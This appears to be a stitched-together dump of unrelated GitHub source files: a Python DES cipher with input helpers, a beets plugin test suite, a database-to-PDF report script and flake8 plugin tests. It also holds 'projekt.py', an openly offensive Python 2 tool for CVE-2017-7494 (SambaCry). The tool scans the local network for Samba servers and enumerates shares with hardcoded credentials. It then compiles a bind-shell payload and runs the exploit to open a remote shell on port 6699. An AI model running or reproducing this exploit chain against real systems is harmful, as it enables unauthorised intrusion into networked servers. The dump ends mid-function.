[9, 14, 15, 5, 2, 8, 12, 3, 7, 0, 4, 10, 1, 13, 11, 6],
[4, 3, 2, 12, 9, 5, 15, 10, 11, 14, 1, 7, 6, 0, 8, 13],
],
[[4, 11, 2, 14, 15, 0, 8, 13, 3, 12, 9, 7, 5, 10, 6, 1],
[13, 0, 11, 7, 4, 9, 1, 10, 14, 3, 5, 12, 2, 15, 8, 6],
[1, 4, 11, 13, 12, 3, 7, 14, 10, 15, 6, 8, 0, 5, 9, 2],
[6, 11, 13, 8, 1, 4, 10, 7, 9, 5, 0, 15, 14, 2, 3, 12],
],
[[13, 2, 8, 4, 6, 15, 11, 1, 10, 9, 3, 14, 5, 0, 12, 7],
[1, 15, 13, 8, 10, 3, 7, 4, 12, 5, 6, 11, 0, 14, 9, 2],
[7, 11, 4, 1, 9, 12, 14, 2, 0, 6, 10, 13, 15, 3, 5, 8],
[2, 1, 14, 7, 4, 10, 8, 13, 15, 12, 9, 0, 3, 5, 6, 11],
]
]
# Permutation matrix following each S-BOX substitution for each round
P = [16, 7, 20, 21, 29, 12, 28, 17,
1, 15, 23, 26, 5, 18, 31, 10,
2, 8, 24, 14, 32, 27, 3, 9,
19, 13, 30, 6, 22, 11, 4, 25]
# Final permutation matrix of data after the 16 rounds
PI_1 = [40, 8, 48, 16, 56, 24, 64, 32,
39, 7, 47, 15, 55, 23, 63, 31,
38, 6, 46, 14, 54, 22, 62, 30,
37, 5, 45, 13, 53, 21, 61, 29,
36, 4, 44, 12, 52, 20, 60, 28,
35, 3, 43, 11, 51, 19, 59, 27,
34, 2, 42, 10, 50, 18, 58, 26,
33, 1, 41, 9, 49, 17, 57, 25]
# Matrix determining the shift for each round of keys
ROUND_KEY_SHIFT = [1, 1, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 1]
ENCRYPTION = 1
DECRYPTION = 0
def string_to_bit_array(text):
"""Convert the string into a list of bits."""
array = list()
for char in text:
bin_val = bin_value(char, 8) # Get value of char in one byte
array.extend([int(x) for x in list(bin_val)]) # Add the bits to the list
return array
def bit_array_to_string(array):
"""Transform bit array to string."""
result_string = ''.join(
[chr(int(i, 2)) for i in
[''.join([str(x) for x in s_bytes])
for s_bytes in split_into_n(array, 8)]]
)
return result_string
def bin_value(val, bit_size):
"""Return the binary value as a string of the given size."""
bin_val = bin(val)[2:] if isinstance(val, int) else bin(ord(val))[2:]
if len(bin_val) > bit_size:
raise "Binary value larger than expected!"
while len(bin_val) < bit_size:
bin_val = "0" + bin_val # Add 0s to satisfy size
return bin_val
def split_into_n(s, n):
"""Split into lists - each of size 'n'."""
return [s[k:k + n] for k in range(0, len(s), n)]
class Des:
def __init__(self):
self.text = None
self.passwd = None
self.keys = list()
def run(self, key, text, action=ENCRYPTION, padding=False):
"""Run the DES algorithm."""
self.text = text
self.passwd = key
if padding and action == ENCRYPTION:
self.add_padding()
elif len(self.text) % 8 != 0: # If not padding specified data size must be multiple of 8 bytes
raise "Data size should be multiple of 8"
self.generate_keys() # Generate all the keys
text_blocks = split_into_n(self.text, 8) # Split the text in blocks of 8 bytes so 64 bits
result = list()
for block in text_blocks: # Loop over all the blocks of data
block = string_to_bit_array(block) # Convert the block in bit array
block = self.permutation(block, PI) # Apply the initial permutation
L, R = split_into_n(block, 32) # L(LEFT), R(RIGHT)
temp = None
for i in range(16): # Perform 16 rounds
d_e = self.expansion(R, E) # Expand R to 48 bits
if action == ENCRYPTION:
temp = self.xor(self.keys[i], d_e) # Use the Ki when encrypting
else:
temp = self.xor(self.keys[15 - i], d_e) # Use the last key when decrypting
temp = self.substitute(temp) # Apply the S-BOXES
temp = self.permutation(temp, P)
temp = self.xor(L, temp)
L = R
R = temp
result += self.permutation(R + L, PI_1) # Perform the last permutation & append the RIGHT to LEFT
final_res = bit_array_to_string(result)
if padding and action == DECRYPTION:
return self.remove_padding(final_res) # Remove the padding if decrypting and padding is used
else:
return final_res # Return the final string of processed data
def substitute(self, d_e):
"""Substitute bytes using S-BOXES."""
sub_blocks = split_into_n(d_e, 6) # Split bit array into sub_blocks of 6 bits each
result = list()
for i in range(len(sub_blocks)): # For all the sub_blocks
block = sub_blocks[i]
row = int(str(block[0]) + str(block[5]), 2) # Find row with the first & last bit
column = int(''.join([str(x) for x in block[1:][:-1]]), 2) # Column value based on 2nd, 3rd, 4th & 5th bit
val = S_BOXES[i][row][column] # Resulting value in the S-BOX for specific round
bin = bin_value(val, 4) # Convert decimal value to binary
result += [int(x) for x in bin] # Append the binary to the resulting list
return result
def permutation(self, block, table):
"""Perform permutation of the given block using the given table."""
return [block[x - 1] for x in table]
def expansion(self, block, table):
"""Perform expansion of d to mach the size of Ki (48 bits)."""
return [block[x - 1] for x in table]
def xor(self, t1, t2):
"""Perform XOR & return the list."""
return [x ^ y for x, y in zip(t1, t2)]
def generate_keys(self):
"""Generate all the keys."""
self.keys = []
key = string_to_bit_array(self.passwd)
key = self.permutation(key, CP_1) # Perform initial permutation on the key
g, d = split_into_n(key, 28) # Split into g (LEFT) & d (RIGHT)
for i in range(16): # Apply the 16 rounds
g, d = self.shift(g, d, ROUND_KEY_SHIFT[i]) # Shift the key according to the round
tmp = g + d # Merge them
self.keys.append(self.permutation(tmp, CP_2)) # Perform the permutation to get the Ki
def shift(self, g, d, n):
"""Shift a list of the given value."""
return g[n:] + g[:n], d[n:] + d[:n]
def add_padding(self):
"""Add padding to the data according to PKCS5 specification."""
pad_len = 8 - (len(self.text) % 8)
self.text += pad_len * chr(pad_len)
def remove_padding(self, data):
"""Remove the padding from the data."""
pad_len = ord(data[-1])
return data[:-pad_len]
def encrypt(self, key, text, padding=True):
"""Perform encryption."""
return self.run(key, text, ENCRYPTION, padding)
def decrypt(self, key, text, padding=True):
"""Perform decryption."""
return self.run(key, text, DECRYPTION, padding)
if __name__ == '__main__':
# des_algorithm.py executed as script
print("Nothing to execute!")
```
#### File: DES_encryptor/file_handling/file_input.py
```python
def text_or_file():
"""Load from file or input manually."""
while True:
load_choice = input("Enter X to enter text manually or F to load from file.")
if load_choice == "F":
return "Y"
elif load_choice == "X":
return "N"
else:
print("Wrong input! Please try again.\n")
def load_file(mode, l_file):
"""Decide which file should be loaded."""
if l_file == "Y":
while True:
file_name = input("Enter the name of file you want to load:")
user_file = open("{}".format(file_name), "r")
if mode == "D": # Reading bytes - converting to string /// not working - encrypted only ///
utf_cont = user_file.read()
cont = str(utf_cont)
else:
cont = user_file.read()
user_file.close()
if len(cont) < 8 and mode == "D":
print("Cannot decrypt less than 8 bytes!")
else:
return cont
elif l_file == "N":
return "N"
else:
print("Wrong input! Please try again.\n")
if __name__ == '__main__':
# file_input.py executed as script
print("Nothing to execute!")
```
#### File: DES_encryptor/user_and_key_io/key_io.py
```python
def key_input():
"""
Enter key to be used.
Don't accept key shorter than 8 bytes.
If key is longer than 8 bytes, cut it to 8 bytes.
"""
while True:
key = input("Enter 8 byte key:")
if len(key) < 8:
print("Key should be 8 bytes long!")
elif len(key) > 8:
key = key[:8] # If entered key is too long, cut to 8 bytes
print("Entered key cut to 8 bytes: '{}' was used as a key.".format(key))
return key
else:
return key
def key_output(mode, used_key):
"""
Return the key used for encryption or decryption,
based on mode that was used.
"""
if mode == "E":
return print("Key used for encryption was: '{}'.".format(used_key))
else:
return print("Key used for decryption was: '{}'.".format(used_key))
def keys_output(mode, used_key_one, used_key_two, used_key_three):
"""
Return the keys used for encryption or decryption,
based on mode that was used.
"""
if mode == "E":
return print("Keys used for encryption were: '{}', '{}', '{}'.".format(
used_key_one, used_key_two, used_key_three)
)
else:
return print("Keys used for decryption were: '{}', '{}', '{}'.".format(
used_key_one, used_key_two, used_key_three)
)
if __name__ == '__main__':
# key_io.py executed as script
print("Nothing to execute!")
```
|
{
"source": "jeenn85/Eternalred_ZIC1",
"score": 2
}
|
#### File: jeenn85/Eternalred_ZIC1/projekt.py
```python
import subprocess
import nmap
import os
import netifaces
import ipaddress
import platform
from exploitsambacry import SambaCry
import time
from impacket.smbconnection import *
from impacket.dcerpc.v5 import transport, srvs
REMOTE_SHELL_PORT = 6699
SMB_PORT = 445
IPV6 = False
def get_ip(v6=False):
"""
Projde vsechny interface pocitace a vraci vsechny aktivni IP adresy vcetne masky site. Nevraci adresu localhost!
i - PROZATIM NEPOCITAME S IPV6 ADRESOU
:param v6: True / False - urcuje zda chceme ziskat IPV6 adresy (prozatim nefunguje)
:return: Vraci <list> aktivnich IP adres vcetne masky site
"""
ip_list = []
interfaces = netifaces.interfaces()
for i in interfaces:
if i == 'lo':
continue
if v6:
iface = netifaces.ifaddresses(i).get(netifaces.AF_INET6)
else:
iface = netifaces.ifaddresses(i).get(netifaces.AF_INET)
if iface is not None:
for j in iface:
cur_ip = j['addr']
cur_mask = j['netmask']
append = False
if v6:
append = False # Prozatim neumi IPv6
else:
if not cur_ip.startswith('127.') and not cur_ip.startswith('169.254'):
append = True
if append:
ip = ipaddress.IPv4Interface(cur_ip + "/" + cur_mask)
ip_list.append(ip)
return ip_list
def get_available_smb(ip, port="445"):
"""
Hleda pc s dostupnymi zadanymi porty. Provede jejich vypis + dalsi informace o protokolu.
Dale necha uzivatele zvolit ip adresu pc s otevrenymi porty v siti s nazvem sluzby netbios-ssn.
:param ip: Adresa site vcetne masky ve formatu napr. 192.168.1.0/24
:param port: prohledavane porty
:return: vraci IP adresu vybraneho serveru, v pripade neuspechu vraci -1
"""
ns = nmap.PortScanner()
ns.scan(ip, port)
print "[?] Vyber Samba server "
i = 0
all_host = ns.all_hosts()
filtered = []
for host in all_host:
if (ns[host]['tcp'][SMB_PORT]['state']) == "open" and ns[host]['tcp'][SMB_PORT]['name'] == "netbios-ssn":
i += 1
print " [", i, "]", host, "\t", ns[host].hostname(), "\t protokol: ", ns[host]['tcp'][SMB_PORT]['name'], "\t status: ", ns[host]['tcp'][SMB_PORT]['state'], "\t verze: ", ns[host]['tcp'][SMB_PORT]['version']
filtered.append(host)
else:
print "\033[35m [ ]", host, "\t", ns[host].hostname(), "\t protokol: ", ns[host]['tcp'][SMB_PORT]['name'], "\t status: ", ns[host]['tcp'][SMB_PORT]['state'], "\t verze: ", ns[host]['tcp'][SMB_PORT]['version'], "\033[0m"
# print(ns.csv())
if len(filtered) != 0:
user_select = int_input_countdown(i)
return filtered[user_select-1]
else:
print "[!] Zadny Samba server k dispozici "
return -1
def compile_payload(payload):
"""
Zjisti verzi OS a v pripade linuxu provede kompilaci Payloadu. Neresi dostupnost gcc. Osetreno vyjimkou.
:param payload: Nazev souboru zdrojoveho kodu pro kompilaci
:return: 0 = uspesne zkompilovano, -1 = neuspech
"""
os_type = platform.system()
if os_type == "Linux":
try:
subprocess.Popen(["gcc", "-shared", "-o", "libpayload.so", "-fPIC", payload], stdout=subprocess.PIPE)
time.sleep(3)
except Exception as e:
print "[-] Exception " + str(e)
return -1
return 0
elif os_type == "Windows":
print "[!] Windows zatim neni podporovan"
return - 1
else:
print "[!] Nepodporovany OS"
return - 1
def payload_list(path):
"""
Projde zadany adresar vraci vechny soubory s priponou .c
:param path: cesta k prohledavanemu adresari
:return: <list> dostupnych souboru s priponou .c
"""
files = []
# r = root, d = slozky, f = soubory
for file in os.listdir(path):
if ".c" in file:
files.append(file)
return files
def input_to_int(usr_input):
"""
Testuje zda-li uzivatelem zadany vstup je cislo. Pokud ano vraci ho.
:param usr_input: uzivatelsky vstup
:return: uzyivatelsky vstu prevedeny na int, v pripade neuspechu -1
"""
try:
value = int(usr_input)
except ValueError:
return -1
if value <= 0:
return -1
return value
def int_input_countdown(i):
"""
Umoznuje uzivately zadat hodnotu typu int v rozsahu 0-i. V pripade, ze 20x zada spatnou volbu, ukonci program.
:param i: Definuje maximalni povolenou hodnotu uzivatelskeho vstupu
:return: Vraci zvolenou hodnotu z povoleneho rozsahu.
"""
print ">> "
j = -20
while j < 0:
if j == 0:
print "[!] 20x jsi nezadal cislo od 1 do", i, ", koncim!"
exit - 1
try:
usr_input = input()
value = input_to_int(usr_input)
except Exception as e:
value = -1
return value
if 0 < value <= i:
return value
print "[i] Zadej cislo od 1 do ", i
j += 1
def print_from_list(list):
"""
Vypise obsah zvoleneho listu.
:param list: list pro vypis
:return: vraci pocet polozek listu
"""
i = 0
for f in list:
i += 1
print " [", i, "]", f
return i
def smb_share_information(target, port, user=None, password=None,):
"""
Vyhleda sdilene slozky pro zadaneho hosta
:param target: IP hosta
:param port: Port hosta
:param user: Uzivatelske jmeno
:param password: <PASSWORD>
:return: <list> s nazvy sdilenych slozek
"""
try:
conn = SMBConnection(target, target, sess_port=port)
except socket.error as error:
print "[-] Chyba spojeni", error.message
return
conn.login(user, password)
if not conn.login(user, password):
raise Exception("[-] Chyba autentizace, neplatne uzivatelske jmeno nebo heslo")
rpc_transport = transport.SMBTransport(
conn.getRemoteName(), conn.getRemoteHost(), filename=r'\srvsvc', smb_connection=conn
)
dce = rpc_transport.get_dce_rpc()
try:
dce.connect()
except SessionError as error:
pass
dce.bind(srvs.MSRPC_UUID_SRVS)
resp = srvs.hNetrShareEnum(dce, 2)
share_path = []
ignore_shares = ["print$", "IPC$"]
for share in resp['InfoStruct']['ShareInfo']['Level2']['Buffer']:
share_name = share['shi2_netname'][:-1]
if share_name not in ignore_shares:
share_path.append(share_name)
return share_path
ipv4 = "0.0.0.0/0"
usr_name = "sambacry"
usr_passwd = "<PASSWORD>"
if __name__ == "__main__":
print """
______ _ _ _____ _
| ____| | | | __ \\ | |
| |__ | |_ ___ _ __ _ __ __ _| | |__) |___ __| |
| __| | __/ _ \\ '__| '_ \\ / _` | | _ // _ \\/ _` |
| |____| || __/ | | | | | (_| | | | \\ \\ __/ (_| |
|______|\\__\\___|_| |_| |_|\\__,_|_|_| \\_\\___|\\__,_|
"""
print(" ---CVE-2017-7494---\n\n")
print "[+] Zjistuji IP adresy "
my_ip_list = get_ip(IPV6)
print "[i] Dostupne IP adresy: "
print_from_list(my_ip_list)
if len(my_ip_list) == 1:
ipv4 = str(ipaddress.IPv4Interface(my_ip_list[0]).network)
elif len(my_ip_list) > 1:
print "[?] Vyber sit k prohledani: "
i = 0
for f in my_ip_list:
i += 1
print " [", i, "]", str(ipaddress.IPv4Interface(f).network)
value = int_input_countdown(i)
ipv4 = str(ipaddress.IPv4Interface(my_ip_list[value]).network)
else:
exit(-1)
print "[+] Hledam Smb Server v siti " + ipv4 + ":"
my_smb_server = get_available_smb(ipv4, str(SMB_PORT))
if my_smb_server == -1:
exit(-1)
shares = smb_share_information(my_smb_server, SMB_PORT, usr_name, usr_passwd)
if len(shares) == 1:
shared_folder = shares[0]
elif len(shares) > 1:
print "[?] Vyber sdilenou slozku "
i = print_from_list(shares)
value = int_input_countdown(i)
shared_folder = shares[i]
else:
exit(-1)
print "[?] Vyber Payload "
files = payload_list(os.getcwd())
i = print_from_list(files)
value = int_input_countdown(i)
if files[value-1] == "bindshell-samba.c":
shell_port = REMOTE_SHELL_PORT
else:
shell_port = None
print "[+] Kompiluji Payload "
if compile_payload(files[value-1]) != 0:
print "[-] Nelze zkompilovat "
exit(-1)
print "[+] Nahravam Payload "
SambaCry.exploit(my_smb_server, SMB_PORT, "libpayload.so", shared_folder, "/" + shared_folder + "/libpayload.so", usr_name, usr_passwd, shell_port)
```
|
{
"source": "jee-r/beets-extrafiles",
"score": 2
}
|
#### File: beets-extrafiles/tests/test_extrafiles.py
```python
import logging
import os
import shutil
import tempfile
import unittest.mock
import beets.util.confit
import beetsplug.extrafiles
RSRC = os.path.join(os.path.dirname(__file__), 'rsrc')
log = logging.getLogger('beets')
log.propagate = True
log.setLevel(logging.DEBUG)
class BaseTestCase(unittest.TestCase):
"""Base testcase class that sets up example files."""
PLUGIN_CONFIG = {
'extrafiles': {
'patterns': {
'log': ['*.log'],
'cue': ['*.cue', '*/*.cue'],
'artwork': ['scans/', 'Scans/', 'artwork/', 'Artwork/'],
},
'paths': {
'artwork': '$albumpath/artwork',
'log': '$albumpath/audio',
},
},
}
def _create_example_file(self, *path):
open(os.path.join(*path), mode='w').close()
def _create_artwork_files(self, *path):
artwork_path = os.path.join(*path)
os.mkdir(artwork_path)
for filename in ('front.jpg', 'back.jpg'):
self._create_example_file(artwork_path, filename)
def setUp(self):
"""Set up example files and instanciate the plugin."""
self.srcdir = tempfile.TemporaryDirectory(suffix='src')
self.dstdir = tempfile.TemporaryDirectory(suffix='dst')
# Create example files for single directory album
os.makedirs(os.path.join(self.dstdir.name, 'single'))
sourcedir = os.path.join(self.srcdir.name, 'single')
os.makedirs(sourcedir)
shutil.copy(
os.path.join(RSRC, 'full.mp3'),
os.path.join(sourcedir, 'file.mp3'),
)
for filename in ('file.cue', 'file.txt', 'file.log'):
self._create_example_file(sourcedir, filename)
self._create_artwork_files(sourcedir, 'scans')
# Create example files for multi-directory album
os.makedirs(os.path.join(self.dstdir.name, 'multiple'))
sourcedir = os.path.join(self.srcdir.name, 'multiple')
os.makedirs(os.path.join(sourcedir, 'CD1'))
shutil.copy(
os.path.join(RSRC, 'full.mp3'),
os.path.join(sourcedir, 'CD1', 'file.mp3'),
)
os.makedirs(os.path.join(sourcedir, 'CD2'))
shutil.copy(
os.path.join(RSRC, 'full.mp3'),
os.path.join(sourcedir, 'CD2', 'file.mp3'),
)
for filename in ('file.txt', 'file.log'):
self._create_example_file(sourcedir, filename)
for discdir in ('CD1', 'CD2'):
self._create_example_file(sourcedir, discdir, 'file.cue')
self._create_artwork_files(sourcedir, 'scans')
# Set up plugin instance
config = beets.util.confit.RootView(sources=[
beets.util.confit.ConfigSource.of(self.PLUGIN_CONFIG),
])
with unittest.mock.patch(
'beetsplug.extrafiles.beets.plugins.beets.config', config,
):
self.plugin = beetsplug.extrafiles.ExtraFilesPlugin('extrafiles')
def tearDown(self):
"""Remove the example files."""
self.srcdir.cleanup()
self.dstdir.cleanup()
class MatchPatternsTestCase(BaseTestCase):
"""Testcase that checks if all extra files are matched."""
def testMatchPattern(self):
"""Test if extra files are matched in the media file's directory."""
sourcedir = os.path.join(self.srcdir.name, 'single')
files = set(
(beets.util.displayable_path(path), category)
for path, category in self.plugin.match_patterns(source=sourcedir)
)
expected_files = set([
(os.path.join(sourcedir, 'scans/'), 'artwork'),
(os.path.join(sourcedir, 'file.cue'), 'cue'),
(os.path.join(sourcedir, 'file.log'), 'log'),
])
assert files == expected_files
class MoveFilesTestCase(BaseTestCase):
"""Testcase that moves files."""
def testMoveFilesSingle(self):
"""Test if extra files are moved for single directory imports."""
sourcedir = os.path.join(self.srcdir.name, 'single')
destdir = os.path.join(self.dstdir.name, 'single')
# Move file
source = os.path.join(sourcedir, 'file.mp3')
destination = os.path.join(destdir, 'moved_file.mp3')
item = beets.library.Item.from_path(source)
shutil.move(source, destination)
self.plugin.on_item_moved(
item, beets.util.bytestring_path(source),
beets.util.bytestring_path(destination),
)
self.plugin.on_cli_exit(None)
# Check source directory
assert os.path.exists(os.path.join(sourcedir, 'file.txt'))
assert not os.path.exists(os.path.join(sourcedir, 'file.cue'))
assert not os.path.exists(os.path.join(sourcedir, 'file.log'))
assert not os.path.exists(os.path.join(sourcedir, 'audio.log'))
assert not os.path.exists(os.path.join(sourcedir, 'artwork'))
assert not os.path.exists(os.path.join(sourcedir, 'scans'))
# Check destination directory
assert not os.path.exists(os.path.join(destdir, 'file.txt'))
assert os.path.exists(os.path.join(destdir, 'file.cue'))
assert not os.path.exists(os.path.join(destdir, 'file.log'))
assert os.path.exists(os.path.join(destdir, 'audio.log'))
assert not os.path.isdir(os.path.join(destdir, 'scans'))
assert os.path.isdir(os.path.join(destdir, 'artwork'))
assert (set(os.listdir(os.path.join(destdir, 'artwork'))) ==
set(('front.jpg', 'back.jpg')))
def testMoveFilesMultiple(self):
"""Test if extra files are moved for multi-directory imports."""
sourcedir = os.path.join(self.srcdir.name, 'multiple')
destdir = os.path.join(self.dstdir.name, 'multiple')
# Move first file
source = os.path.join(sourcedir, 'CD1', 'file.mp3')
destination = os.path.join(destdir, '01 - moved_file.mp3')
item = beets.library.Item.from_path(source)
shutil.move(source, destination)
self.plugin.on_item_moved(
item, beets.util.bytestring_path(source),
beets.util.bytestring_path(destination),
)
# Move second file
source = os.path.join(sourcedir, 'CD2', 'file.mp3')
destination = os.path.join(destdir, '02 - moved_file.mp3')
item = beets.library.Item.from_path(source)
shutil.move(source, destination)
self.plugin.on_item_moved(
item, beets.util.bytestring_path(source),
beets.util.bytestring_path(destination),
)
self.plugin.on_cli_exit(None)
# Check source directory
assert os.path.exists(os.path.join(sourcedir, 'file.txt'))
assert not os.path.exists(os.path.join(sourcedir, 'CD1', 'file.cue'))
assert not os.path.exists(os.path.join(sourcedir, 'CD2', 'file.cue'))
assert not os.path.exists(os.path.join(sourcedir, 'file.log'))
assert not os.path.exists(os.path.join(sourcedir, 'audio.log'))
assert not os.path.exists(os.path.join(sourcedir, 'artwork'))
assert not os.path.exists(os.path.join(sourcedir, 'scans'))
# Check destination directory
assert not os.path.exists(os.path.join(destdir, 'file.txt'))
assert not os.path.exists(os.path.join(sourcedir, 'CD1_file.cue'))
assert not os.path.exists(os.path.join(sourcedir, 'CD2_file.cue'))
assert not os.path.exists(os.path.join(destdir, 'file.log'))
assert os.path.exists(os.path.join(destdir, 'audio.log'))
assert not os.path.isdir(os.path.join(destdir, 'scans'))
assert os.path.isdir(os.path.join(destdir, 'artwork'))
assert (set(os.listdir(os.path.join(destdir, 'artwork'))) ==
set(('front.jpg', 'back.jpg')))
class CopyFilesTestCase(BaseTestCase):
"""Testcase that copies files."""
def testCopyFilesSingle(self):
"""Test if extra files are copied for single directory imports."""
sourcedir = os.path.join(self.srcdir.name, 'single')
destdir = os.path.join(self.dstdir.name, 'single')
# Copy file
source = os.path.join(sourcedir, 'file.mp3')
destination = os.path.join(destdir, 'copied_file.mp3')
item = beets.library.Item.from_path(source)
shutil.copy(source, destination)
self.plugin.on_item_copied(
item, beets.util.bytestring_path(source),
beets.util.bytestring_path(destination),
)
self.plugin.on_cli_exit(None)
# Check source directory
assert os.path.exists(os.path.join(sourcedir, 'file.txt'))
assert os.path.exists(os.path.join(sourcedir, 'file.cue'))
assert os.path.exists(os.path.join(sourcedir, 'file.log'))
assert not os.path.exists(os.path.join(sourcedir, 'audio.log'))
assert not os.path.exists(os.path.join(sourcedir, 'artwork'))
assert os.path.isdir(os.path.join(sourcedir, 'scans'))
assert (set(os.listdir(os.path.join(sourcedir, 'scans'))) ==
set(('front.jpg', 'back.jpg')))
# Check destination directory
assert not os.path.exists(os.path.join(destdir, 'file.txt'))
assert os.path.exists(os.path.join(destdir, 'file.cue'))
assert not os.path.exists(os.path.join(destdir, 'file.log'))
assert os.path.exists(os.path.join(destdir, 'audio.log'))
assert not os.path.exists(os.path.join(destdir, 'scans'))
assert os.path.isdir(os.path.join(destdir, 'artwork'))
assert (set(os.listdir(os.path.join(destdir, 'artwork'))) ==
set(('front.jpg', 'back.jpg')))
def testCopyFilesMultiple(self):
"""Test if extra files are copied for multi-directory imports."""
sourcedir = os.path.join(self.srcdir.name, 'multiple')
destdir = os.path.join(self.dstdir.name, 'multiple')
# Copy first file
source = os.path.join(sourcedir, 'CD1', 'file.mp3')
destination = os.path.join(destdir, '01 - copied_file.mp3')
item = beets.library.Item.from_path(source)
shutil.copy(source, destination)
self.plugin.on_item_copied(
item, beets.util.bytestring_path(source),
beets.util.bytestring_path(destination),
)
# Copy second file
source = os.path.join(sourcedir, 'CD2', 'file.mp3')
destination = os.path.join(destdir, '02 - copied_file.mp3')
item = beets.library.Item.from_path(source)
shutil.copy(source, destination)
self.plugin.on_item_copied(
item, beets.util.bytestring_path(source),
beets.util.bytestring_path(destination),
)
self.plugin.on_cli_exit(None)
# Check source directory
assert os.path.exists(os.path.join(sourcedir, 'file.txt'))
assert os.path.exists(os.path.join(sourcedir, 'CD1', 'file.cue'))
assert os.path.exists(os.path.join(sourcedir, 'CD2', 'file.cue'))
assert os.path.exists(os.path.join(sourcedir, 'file.log'))
assert not os.path.exists(os.path.join(sourcedir, 'audio.log'))
assert not os.path.exists(os.path.join(sourcedir, 'artwork'))
assert os.path.isdir(os.path.join(sourcedir, 'scans'))
assert (set(os.listdir(os.path.join(sourcedir, 'scans'))) ==
set(('front.jpg', 'back.jpg')))
# Check destination directory
assert not os.path.exists(os.path.join(destdir, 'file.txt'))
assert os.path.exists(os.path.join(destdir, 'CD1_file.cue'))
assert os.path.exists(os.path.join(destdir, 'CD2_file.cue'))
assert not os.path.exists(os.path.join(destdir, 'file.log'))
assert os.path.exists(os.path.join(destdir, 'audio.log'))
assert not os.path.exists(os.path.join(destdir, 'scans'))
assert os.path.isdir(os.path.join(destdir, 'artwork'))
assert (set(os.listdir(os.path.join(destdir, 'artwork'))) ==
set(('front.jpg', 'back.jpg')))
class MultiAlbumTestCase(unittest.TestCase):
"""Testcase class that checks if multiple albums are grouped correctly."""
PLUGIN_CONFIG = {
'extrafiles': {
'patterns': {
'log': ['*.log'],
},
},
}
def setUp(self):
"""Set up example files and instanciate the plugin."""
self.srcdir = tempfile.TemporaryDirectory(suffix='src')
self.dstdir = tempfile.TemporaryDirectory(suffix='dst')
for album in ('album1', 'album2'):
os.makedirs(os.path.join(self.dstdir.name, album))
sourcedir = os.path.join(self.srcdir.name, album)
os.makedirs(sourcedir)
shutil.copy(
os.path.join(RSRC, 'full.mp3'),
os.path.join(sourcedir, 'track01.mp3'),
)
shutil.copy(
os.path.join(RSRC, 'full.mp3'),
os.path.join(sourcedir, 'track02.mp3'),
)
logfile = os.path.join(sourcedir, '{}.log'.format(album))
open(logfile, mode='w').close()
# Set up plugin instance
config = beets.util.confit.RootView(sources=[
beets.util.confit.ConfigSource.of(self.PLUGIN_CONFIG),
])
with unittest.mock.patch(
'beetsplug.extrafiles.beets.plugins.beets.config', config,
):
self.plugin = beetsplug.extrafiles.ExtraFilesPlugin('extrafiles')
def tearDown(self):
"""Remove the example files."""
self.srcdir.cleanup()
self.dstdir.cleanup()
def testAlbumGrouping(self):
"""Test if albums are."""
for album in ('album1', 'album2'):
sourcedir = os.path.join(self.srcdir.name, album)
destdir = os.path.join(self.dstdir.name, album)
for i in range(1, 3):
source = os.path.join(sourcedir, 'track{0:02d}.mp3'.format(i))
destination = os.path.join(
destdir, '{0:02d} - {1} - untitled.mp3'.format(i, album),
)
item = beets.library.Item.from_path(source)
item.album = album
item.track = i
item.tracktotal = 2
shutil.copy(source, destination)
self.plugin.on_item_copied(
item, beets.util.bytestring_path(source),
beets.util.bytestring_path(destination),
)
self.plugin.on_cli_exit(None)
for album in ('album1', 'album2'):
destdir = os.path.join(self.dstdir.name, album)
for i in range(1, 3):
destination = os.path.join(
destdir, '{0:02d} - {1} - untitled.mp3'.format(i, album),
)
assert os.path.exists(destination)
assert os.path.exists(os.path.join(
self.dstdir.name, album, '{}.log'.format(album),
))
```
|
{
"source": "Jeernej/XLAB_delavnica",
"score": 3
}
|
#### File: XLAB_delavnica/report/main.py
```python
import argparse
import datetime
import getpass
import sys
import openpyxl
from report.db import Database
from report.pdf import Pdf
"""
Main module (command-line program).
"""
class ArgParser(argparse.ArgumentParser):
"""
Argument parser that displays help on error
"""
def error(self, message):
self.print_help()
sys.stderr.write("error: {}\n".format(message))
sys.exit(2)
def _parse_arguments():
parser = ArgParser(
description="Demo report generator",
formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
parser.add_argument("host", help="Database host IP address")
parser.add_argument("port", help="Database host port")
parser.add_argument("user", help="Database user")
parser.add_argument("dbname", help="Database name")
args = parser.parse_args()
args.password = <PASSWORD>()
return args
def main():
args = _parse_arguments()
# Database access
db = Database(args.host, args.port, args.user, args.password, args.dbname)
result = db.execute("select * from store")
print(result)
#http://initd.org/psycopg/docs/usage.html#passing-parameters-to-sql-queries
result = db.execute("select * from rental where rental_date < %s",
(datetime.date(2005, 5, 25),))
print(result)
result = db.execute("select * from rental where rental_date < %(date)s",
{"date": datetime.date(2005, 5, 25)})
print(result)
# Excel writing
wb = openpyxl.Workbook()
ws = wb.active
ws.title = "Data"
titles = "store_id", "manager_staff_id", "address_id", "last_update"
for i, t in enumerate(titles, 1):
ws.cell(1, i, t)
for i, row in enumerate(result, 2):
for j, val in enumerate(row, 1):
ws.cell(i, j, val)
wb.save("sample.xlsx")
# PDF generation
pdf = Pdf("test.pdf")
pdf.set_store_address(("Store A", "My road 3", "another line", "City"))
rows = (
("c1", "c2", "c3"),
("v1", "v2", "v3"),
)
sizes = 20, 30, 10
pdf.add_table(rows, sizes)
pdf.add_paragraph("Long text should this be but there is just no time.")
labels = ("Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug")
data = [
( 13, 5, 20, 22, 37, 45, 19, 4),
( 5, 20, 46, 38, 23, 21, 6, 14),
]
pdf.add_line_chart(140, 70, labels, data)
pdf.add_paragraph("Long text should this be but there is just no time.")
pdf.add_bar_chart(170, 60, labels, data, 0, 60)
pdf.add_paragraph("Long text should this be but there is just no time.")
pdf.add_pie_chart(80, 80, labels, data[0])
pdf.add_pie_chart(80, 80, labels, data[1], side_labels=True)
pdf.add_paragraph("Long text should this be but there is just no time.")
pdf.save()
return 0
```
|
{
"source": "jeertmans/flake8",
"score": 2
}
|
#### File: tests/unit/test_plugin.py
```python
import argparse
import mock
import pytest
from flake8 import exceptions
from flake8.options import manager as options_manager
from flake8.plugins import manager
def test_load_plugin_fallsback_on_old_setuptools():
"""Verify we fallback gracefully to on old versions of setuptools."""
entry_point = mock.Mock(spec=['load'])
plugin = manager.Plugin('T000', entry_point)
plugin.load_plugin()
entry_point.load.assert_called_once_with()
def test_load_plugin_is_idempotent():
"""Verify we use the preferred methods on new versions of setuptools."""
entry_point = mock.Mock(spec=['load'])
plugin = manager.Plugin('T000', entry_point)
plugin.load_plugin()
